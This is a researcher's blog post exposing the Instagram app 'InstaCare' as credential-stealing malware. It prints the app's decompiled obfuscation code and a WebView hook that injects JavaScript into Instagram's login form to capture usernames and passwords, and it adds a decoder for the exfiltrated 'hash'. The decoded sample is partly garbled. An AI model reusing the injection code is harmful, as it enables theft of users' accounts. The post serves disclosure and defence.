
Hacking a hacker – InstaAgent developer Turker Bayram strikes back.

UPDATE: The iOS version steals the password too. “Who Cares With Me – InstaDetector“ is also affected. Read more.

Last week the InstaAgent developer “Turker Bayram” released a new app for the Android and iOS app stores, after his (malicious) app “InstaAgent” was pulled by Apple and Google from their stores. I was astonished that Apple and Google did not take a closer look at his new application; one would assume that a developer who has already published a malicious app would be watched more closely. His new app is called “Who Viewed Me on Instagram” (Android version, 50K – 100K downloads) and “InstaCare – Who cares with me?” (iOS version, a top-grossing app in Germany in the Entertainment category). The app promises the same functionality as InstaAgent did:

“- This app can show you up to most recent 100 list for your Instagram profile.

– This app displays your friend list in order, who cares your profile most with your profile interaction.”


Again, I analysed the app to find out whether it steals the Instagram username and password again. At first glance it did not seem to, but there is one suspicious HTTPS packet:


There is an HTTPS body value called “hash”. The data is base64 encoded and AES encrypted. To find the key for the AES-encrypted data, I “decompiled” the Android version of InstaCare. This is what the encryption algorithm looks like:


The interesting parts are:

The AES encryption (PART A):


import java.security.GeneralSecurityException;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

// abyte0 = raw AES key bytes, abyte1 = data to encrypt.
// AES in ECB mode with PKCS5 padding; the decompiler emitted the literal 1 for Cipher.ENCRYPT_MODE.
private static byte[] a(byte abyte0[], byte abyte1[]) throws GeneralSecurityException
{
    SecretKeySpec key = new SecretKeySpec(abyte0, "AES");
    Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
    cipher.init(Cipher.ENCRYPT_MODE, key);
    return cipher.doFinal(abyte1);
}

And the AES key generation (PART B):

private static String b(String s)
{
    // Substitution alphabet: the index of an input character in this string
    // selects a two-character pair from one of the 13 rows below.
    String alphabet = "LHMgO!X&3I09KenZST/W)lEbCD:Rizh5,N+oy>qcPxdpY_fuAU-#jw[]F<{}4k%BG;1J6?(vm2sa.rtV78Q ";

    // 13 substitution rows; row (i % 13) is used for the input character at position i.
    String as[] = new String[13];
    as[0] = "iiksdnhncvwyfmhrucwfdqraeilxyfjdovvthbgkzefbrntjrrpuofvuogujldmxqhtfjwpfcyguixdwrtqnxmutyieupqwwynewilsskvniflzfqpqubxmszkwvrhfhwrcospqqaucwjxsdttdfkapbtoziycijifgixiiw";
    as[1] = "bprcrdeqmdymivvooydixtwsdloqgdahusjkyohhsdvawoonktyjkvbnfrklulunddqwsffjjxjhowvwrphajiopxxatlugozemokswushaffvdzqvvmjulkmqetlaphrnybmbzrqhcyczhmruzdrazcbuasarebwxbxbwhe";
    as[2] = "bspojulxamjnhaglkzrygalmmxcpuijvxwjjsyithsfotlxdhrwoskadjdudlcqlbhvucclkvrwncwrkopwfxxdcmpfkagsvxvetcdfebzorlnylmfvpihensfviavdqghpikymmsbownbdirlpyxgbvpbptwyaodkjrzasx";
    as[3] = "lpqtcbaqbxhukfccaagpnxtpdvrpnguxzssxutzvtdodjrfkrmxelsvplkfxrwxnrrmjjidbmsezikgxzgdiqwwjidjxbixwhekuzppexzdzchfafdjogunicxabqbkefvwckogjkkgmtlnwpqmyrxdtwdvzeebkxxouexmq";
    as[4] = "wdgyoscucxoiqumhsrcoxyqiyjfedehkxzbbrdbemxwwhpokdnfbyeqsoczsgdbgadirgkytjursifbmtgnoklgxncrugtxhyiqcttycmmuvsvbvxmfglujcnrymvyunoopaaivtdbcezcscicyseihayfakdoxtoabjteky";
    as[5] = "movgcnpxgzlyqtvlxyevlcjxrudfzpurzyemvkjfggwatqyzshwbgiaqbecquyorsudlskupllnhieohgypguskypesdyiqwvcmebqrofwuvfxpvlseazzesfcrxecgmpqavyuoaueyxssinnnftpztvwdlfracsyqljweov";
    as[6] = "lkfzadkymzrcopeeehkfimugxxgorvxbefqfjhbzeswugcqlkiruyjavjgixaibfnxkzgmtldsekvbyekmwfywxfeiffrglefybmivqmlczgdtloejuahufmblttsdqqxwuhufjrlnizbngvnnouaretjzyguyfccxeumpmh";
    as[7] = "ynkrnmhheyddbastbwsdewsignocjcpepavdmclsqoywpmsrkivpglwnrhrfmfghjtjvkgjgfwtqpdfjumvtatfrxyzmbcukycfgjompnfitlcvfwazwyukqzehthnwrblgortrxbrizyhqsgtlrxclqjxbxwdvaudqpkvhr";
    as[8] = "ynkrnmhheyddbastbwsdewsignocjcpepavdmclsqoywpmsrkivpglwnrhrfmfghjtjvkgjgfwtqpdfjumvtatfrxyzmbcukycfgjompnfitlcvfwazwyukqzehthnwrblgortrxbrizyhqsgtlrxclqjxbxwdvaudqpkvhr";
    as[9] = "vljhyuiqszparjktssogdpnedhoapozjxgsyxxtszhtmscejvupwjccmjrmxfjifrxapxuhybxitcnbzgrvruqcdopcuxlxplxfkumgvmonobokiffwwdbcsselrpkgakmldxswlflakpgrneuohlflqzbidpnqpeyharhlg";
    as[10] = "ualsawqpldqqsqhtnicneojfjqvfvgbognfhqzgvvwtbsgjuuoidusqyvxkbmriqvbapxtrrwxjtotzhurgestvaroflpfwsfqrppehlmsjiwcxfgsqbsorqagdaybsbwinwaapjiomiutxrvsfkrtgmuwntgdhvbhsdfdmw";
    as[11] = "uncxogkwwbsbsouqkjmlthbrueadocgirjheptcnuupkiiittvdkcfbzjbxwefhvopxehctazhlepvoatsfunpymoxtyvhlultzdutkezaxuhnuxfxpofdnqxiekcpdwuzrebneagmmuxfmousshospucsifpcgdulexquxj";
    as[12] = "ncjqnuqeqfoghrqtwmmsieahqxcbmpaxtkdyjaaqgioebnrnextfhpejssxtdozgjghkeotutvgjhlixsppyxhnwxerctmjcurfgsqawhikrhbgqeeovhhkbhqxmerkeotmwivaotqvqhxcyvjccamdhkcvothgfxgvtpkos";

    StringBuilder stringbuilder = new StringBuilder();
    int i = 0;
    while (i < s.length())
    {
        int j = as.length;
        if (alphabet.indexOf(s.charAt(i)) > -1)
        {
            // Character is in the alphabet: emit the 2-char pair at offset (index * 2) of row (i % 13).
            int k = alphabet.indexOf(s.charAt(i)) * 2;
            stringbuilder.append(as[i % j].substring(k, k + 2));
        }
        else
        {
            // Character is not in the alphabet: emit it twice, unchanged.
            stringbuilder.append(s.charAt(i)).append(s.charAt(i));
        }
        i++;
    }
    return stringbuilder.toString();
}

And PART C

import android.webkit.WebView;

// Decompiled WebViewClient callback; the obfuscated references a.b.j and ar.m are left as-is.
@Override
public void onPageFinished(WebView webview, String s)
{
    a.b.j.dismiss(); // decompiled name, presumably a progress dialog
    // Only acts on the Instagram login page, and only while the flag ar.m equals "test".
    if (s.indexOf("accounts/login/") > 0 && ar.m.equals("test"))
    {
        // The decompiler reused the String parameter 's' for this builder, which does not compile.
        StringBuilder js = new StringBuilder();
        js.append("document.getElementsByTagName('form')[0].onsubmit = function () {");
        js.append("var objPWD, objAccount;var str = '';");
        js.append("var inputs = document.getElementsByTagName('input');");
        js.append("for (var i = 0; i < inputs.length; i++) {");
        js.append("if (inputs[i].type.toLowerCase() === 'password') {objPWD = inputs[i];}");
        js.append("else if (inputs[i].name.toLowerCase() === 'username') {objAccount = inputs[i];}");
        js.append("}");
        js.append("if (objAccount != null) {str += objAccount.value;}");
        js.append("if (objPWD != null) { str += ',-UPPA-,' + objPWD.value;}");
        // Hands the "username,-UPPA-,password" string back to the app through its JavaScript bridge.
        js.append("window.MYOBJECT.processHTML(str);");
        js.append("return true;");
        js.append("};");
        webview.loadUrl("javascript:" + js.toString());
    }
}

PART C is used to inject JavaScript into the Instagram login page: it collects the username and the password into a string and hands it to the app (window.MYOBJECT.processHTML), which then sends it to his server.


For the AES key generation he uses a combination of a UDID and an ID (given by the server), for example:

uuid=16cdeef358a33ace and id=221163.0c5; then the key looks like: 221163.0c516cdeef358a33ace (he also sends both of these values to his server!)

He “encrypts” the AES key with PART B. After this step the key looks like “dfoykykkbgljjzrt”. He then “encrypts” the string from PART C (which contains the user’s Instagram username and password plus other metadata) with the algorithm of PART B as well. To make the encryption even harder, he encrypts this string again with the AES key he generated from the UDID and ID. After this procedure he sends the encrypted string (base64 encoded), the UDID and the ID to his server (https://api-2.instadetect.com).



With the ID and the UDID of the user he is able to decrypt the Instagram password and username again later. A working PoC (that decrypts the string), written in Java, can be found here.
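To make the scheme concrete, here is an added Java re-implementation of the whole “hash” pipeline. This is my example, not the author’s PoC and not code from the app: it contains PART B’s substitution (alphabet and the 13 rows copied from above) together with its inverse, PART A’s AES/ECB step, and the key derivation from id + uuid. Class and method names are mine, the sample payload is constructed, and the assumption that the app keeps the first 16 characters of the PART B output as the AES-128 key (the key quoted above is 16 characters long) is mine as well. The point for anyone holding a captured request: uuid and id travel in the same request as the “hash”, so the whole thing can be reversed without any secret.

```java
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

// Added example (not the app's code): re-implementation of the "hash" pipeline described in the post.
public class InstaCareHashDecoder {

    // Alphabet from PART B: the index of a character selects a 2-char pair from a row.
    private static final String ALPHABET =
        "LHMgO!X&3I09KenZST/W)lEbCD:Rizh5,N+oy>qcPxdpY_fuAU-#jw[]F<{}4k%BG;1J6?(vm2sa.rtV78Q ";

    // Substitution rows from PART B; row (i % 13) is used for input position i.
    private static final String[] ROWS = {
        "iiksdnhncvwyfmhrucwfdqraeilxyfjdovvthbgkzefbrntjrrpuofvuogujldmxqhtfjwpfcyguixdwrtqnxmutyieupqwwynewilsskvniflzfqpqubxmszkwvrhfhwrcospqqaucwjxsdttdfkapbtoziycijifgixiiw",
        "bprcrdeqmdymivvooydixtwsdloqgdahusjkyohhsdvawoonktyjkvbnfrklulunddqwsffjjxjhowvwrphajiopxxatlugozemokswushaffvdzqvvmjulkmqetlaphrnybmbzrqhcyczhmruzdrazcbuasarebwxbxbwhe",
        "bspojulxamjnhaglkzrygalmmxcpuijvxwjjsyithsfotlxdhrwoskadjdudlcqlbhvucclkvrwncwrkopwfxxdcmpfkagsvxvetcdfebzorlnylmfvpihensfviavdqghpikymmsbownbdirlpyxgbvpbptwyaodkjrzasx",
        "lpqtcbaqbxhukfccaagpnxtpdvrpnguxzssxutzvtdodjrfkrmxelsvplkfxrwxnrrmjjidbmsezikgxzgdiqwwjidjxbixwhekuzppexzdzchfafdjogunicxabqbkefvwckogjkkgmtlnwpqmyrxdtwdvzeebkxxouexmq",
        "wdgyoscucxoiqumhsrcoxyqiyjfedehkxzbbrdbemxwwhpokdnfbyeqsoczsgdbgadirgkytjursifbmtgnoklgxncrugtxhyiqcttycmmuvsvbvxmfglujcnrymvyunoopaaivtdbcezcscicyseihayfakdoxtoabjteky",
        "movgcnpxgzlyqtvlxyevlcjxrudfzpurzyemvkjfggwatqyzshwbgiaqbecquyorsudlskupllnhieohgypguskypesdyiqwvcmebqrofwuvfxpvlseazzesfcrxecgmpqavyuoaueyxssinnnftpztvwdlfracsyqljweov",
        "lkfzadkymzrcopeeehkfimugxxgorvxbefqfjhbzeswugcqlkiruyjavjgixaibfnxkzgmtldsekvbyekmwfywxfeiffrglefybmivqmlczgdtloejuahufmblttsdqqxwuhufjrlnizbngvnnouaretjzyguyfccxeumpmh",
        "ynkrnmhheyddbastbwsdewsignocjcpepavdmclsqoywpmsrkivpglwnrhrfmfghjtjvkgjgfwtqpdfjumvtatfrxyzmbcukycfgjompnfitlcvfwazwyukqzehthnwrblgortrxbrizyhqsgtlrxclqjxbxwdvaudqpkvhr",
        "ynkrnmhheyddbastbwsdewsignocjcpepavdmclsqoywpmsrkivpglwnrhrfmfghjtjvkgjgfwtqpdfjumvtatfrxyzmbcukycfgjompnfitlcvfwazwyukqzehthnwrblgortrxbrizyhqsgtlrxclqjxbxwdvaudqpkvhr",
        "vljhyuiqszparjktssogdpnedhoapozjxgsyxxtszhtmscejvupwjccmjrmxfjifrxapxuhybxitcnbzgrvruqcdopcuxlxplxfkumgvmonobokiffwwdbcsselrpkgakmldxswlflakpgrneuohlflqzbidpnqpeyharhlg",
        "ualsawqpldqqsqhtnicneojfjqvfvgbognfhqzgvvwtbsgjuuoidusqyvxkbmriqvbapxtrrwxjtotzhurgestvaroflpfwsfqrppehlmsjiwcxfgsqbsorqagdaybsbwinwaapjiomiutxrvsfkrtgmuwntgdhvbhsdfdmw",
        "uncxogkwwbsbsouqkjmlthbrueadocgirjheptcnuupkiiittvdkcfbzjbxwefhvopxehctazhlepvoatsfunpymoxtyvhlultzdutkezaxuhnuxfxpofdnqxiekcpdwuzrebneagmmuxfmousshospucsifpcgdulexquxj",
        "ncjqnuqeqfoghrqtwmmsieahqxcbmpaxtkdyjaaqgioebnrnextfhpejssxtdozgjghkeotutvgjhlixsppyxhnwxerctmjcurfgsqawhikrhbgqeeovhhkbhqxmerkeotmwivaotqvqhxcyvjccamdhkcvothgfxgvtpkos",
    };

    /** PART B: position-dependent substitution, two output characters per input character. */
    public static String substitute(String s) {
        StringBuilder out = new StringBuilder();
        for (int i = 0; i < s.length(); i++) {
            int idx = ALPHABET.indexOf(s.charAt(i));
            if (idx > -1) {
                int k = idx * 2;
                out.append(ROWS[i % ROWS.length], k, k + 2);
            } else {
                out.append(s.charAt(i)).append(s.charAt(i)); // not in the alphabet: doubled literally
            }
        }
        return out.toString();
    }

    /** Inverse of PART B: the 2-char chunk at position i is looked up at even offsets of row (i % 13).
     *  Rows are all lowercase letters and every lowercase letter is in ALPHABET, so a doubled
     *  literal (e.g. "==") can never be confused with a row pair. If a row contains the same
     *  pair twice, the first match wins, so such characters may decode ambiguously. */
    public static String unsubstitute(String t) {
        StringBuilder out = new StringBuilder();
        for (int i = 0; 2 * i + 1 < t.length(); i++) {
            String pair = t.substring(2 * i, 2 * i + 2);
            String row = ROWS[i % ROWS.length];
            int pos = -1;
            for (int k = 0; k + 2 <= row.length(); k += 2) {
                if (row.startsWith(pair, k)) { pos = k / 2; break; }
            }
            out.append(pos > -1 ? ALPHABET.charAt(pos) : pair.charAt(0));
        }
        return out.toString();
    }

    /** PART A: AES/ECB/PKCS5Padding with the raw key bytes (mode = ENCRYPT_MODE or DECRYPT_MODE). */
    public static byte[] aes(int mode, byte[] key, byte[] data) throws GeneralSecurityException {
        Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
        cipher.init(mode, new SecretKeySpec(key, "AES"));
        return cipher.doFinal(data);
    }

    /** Key derivation as described in the post: id + uuid, run through PART B.
     *  Assumption (mine): the first 16 characters of the result are used as the AES-128 key. */
    public static byte[] deriveKey(String id, String uuid) {
        return substitute(id + uuid).substring(0, 16).getBytes(StandardCharsets.US_ASCII);
    }

    /** What the app does to the payload before sending it as "hash". */
    public static String encodeHash(String payload, String id, String uuid) throws GeneralSecurityException {
        byte[] obfuscated = substitute(payload).getBytes(StandardCharsets.UTF_8);
        return Base64.getEncoder().encodeToString(aes(Cipher.ENCRYPT_MODE, deriveKey(id, uuid), obfuscated));
    }

    /** What anyone holding the captured request can do, since uuid and id are sent alongside "hash". */
    public static String decodeHash(String hash, String id, String uuid) throws GeneralSecurityException {
        byte[] plain = aes(Cipher.DECRYPT_MODE, deriveKey(id, uuid), Base64.getDecoder().decode(hash));
        return unsubstitute(new String(plain, StandardCharsets.UTF_8));
    }

    public static void main(String[] args) throws GeneralSecurityException {
        // uuid and id are the example values quoted in the post; the payload is constructed.
        String id = "221163.0c5", uuid = "16cdeef358a33ace";
        String payload = "uuid=" + uuid + "&uppa=EXAMPLE_USER,-UPPA-,EXAMPLE_PASSWORD";
        String hash = encodeHash(payload, id, uuid);
        System.out.println("hash=" + hash);
        System.out.println("recovered=" + decodeHash(hash, id, uuid));
    }
}
```

Compile and run with `javac InstaCareHashDecoder.java && java InstaCareHashDecoder`. If the key-length assumption is wrong for a real capture, the AES step fails with a bad-padding error rather than producing garbage, which makes it easy to tell; the PART B inverse does not depend on that assumption at all.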

The decrypted string contains the following:

device=androidg26verJion=v1.2&uuid=56cdaef358a33ace&lang=de&countryg3DDE&packet=com.instacare.insta&idi3D268163.0b5i26referansg3D{70945.9a2g26lis0e=&uppa=USERNAME,-UPPA-i2CPASSWORDg26goon=

As you can see, the encrypted string that is sent to the server of the InstaCare developer contains the Instagram password and username!

After successfully stealing the Instagram login credentials, he uses them to post spam images to the hijacked accounts:


Unfortunately I am currently not able to analyse the iOS version of the app completely (I don’t have a jailbroken iOS device to decrypt the binary). But the same “suspicious” HTTPS packet can also be found in the network traffic of the iOS version:


He probably uses another key combination for the iOS version, so I am currently not able to decrypt it. But if you ask me, it is most likely that the iOS version also steals the user’s Instagram password and username. This would be the second time this developer has published malware to the iOS App Store! Just like “InstaAgent”, the new app “InstaCare” is again in the iOS top charts with thousands of downloads! Again Apple and Google did not manage to keep their app stores free of malware: they let a malicious app from the SAME developer into their stores for the second time. Apple and Google should remove these apps as soon as possible! 😿😂
